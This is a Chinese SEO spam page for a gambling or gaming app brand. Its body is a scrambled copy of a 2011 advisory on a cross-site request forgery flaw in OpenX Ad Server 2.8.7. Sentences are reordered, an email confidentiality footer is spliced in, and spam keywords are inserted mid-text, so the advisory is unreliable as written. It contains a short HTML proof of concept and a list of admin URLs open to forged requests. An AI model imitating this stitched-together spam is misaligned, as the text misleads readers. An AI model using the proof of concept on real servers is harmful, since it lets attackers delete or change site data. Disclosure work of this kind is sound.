东台市万达娱乐APP下载有限公司创办于2011年,产品包括万达娱乐登录地址app,万达娱乐登录地址,产品深受国内外用户的赞誉,员工超3千人,万达娱乐是游戏玩家必备网站!

万达娱乐有限公司欢迎您!

万达娱乐登录地址appOpenX Ad Server 2.8.7跨站请求伪造

时间:2020-11-21 18:14

000 websites in more than 100 countries and serve more than 350 billion ads monthly. OpenX Market reaches more than 400 million monthly unique users worldwide Source: Vulnerability Information: ------------------------- Class: Cross-Site Request Forgery (CSRF) [CWE-352] Impact: Unintentional changes in application. Remotely Exploitable: Yes Authentication Required: No User interaction Required : Yes 问题描述: ----------------------------------- The administrative interface of OpenX Ad Server is vulnerable to Cross-Site Request Forgery (CSRF) attacks, Title: OpenX Ad Server CSRF Vulnerability Product: OpenX Ad Server Vulnerable version: 2.8.7 and probably earlier versions Fixed version: N/A Impact: High Homepage: 测试平台: Ubuntu 11.04 By: Narendra Shinde ======================================================================= Vendor description: ------------------- OpenX is the worlds leading independent provider of digital advertising technology that enables businesses to manage and maximize their ad revenue. OpenX ad serving products are used by more than 200,万达娱乐, please notify the sender immediately and do not disclose the contents to another person use it for any purpose, Narendra. Confidentiality: This e-mail and any attachments may be confidential and may also be privileged. If you are not an intended named recipient, which can be exploited by remote attackers to force a logged-in administrator to perform malicious actions on the OpenX Ad Server。

or store or copy the information in any medium. 。

by enticing authenticated user to visit a malicious web page.Attacker can modify application data. Proof of concept: ----------------- Code: html body h1 Check This new Snap /h1 a href= /www/admin/advertiser-delete.php?clientid=2 Check This /a /body /html The following URL could be used to perform CSRF attacks: /www/admin/advertiser-delete.php?clientid=[valid-id] /www/admin/advertiser-user-unlink.php?userid=[valid-id]clientid[valid-id] /www/admin/tracker-delete.php?clientid[valid-id]trackerid[valid-id] Workaround: ----------- https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet Timeline: Discovered: 7/7/2011 Contacted vendor : No response Again Contacted Vendor: 19/7/2011 NO Respoonse Public Disclosure :24/7/2011 Thanks Regards,万达娱乐app下载,万达娱乐,。

sitemap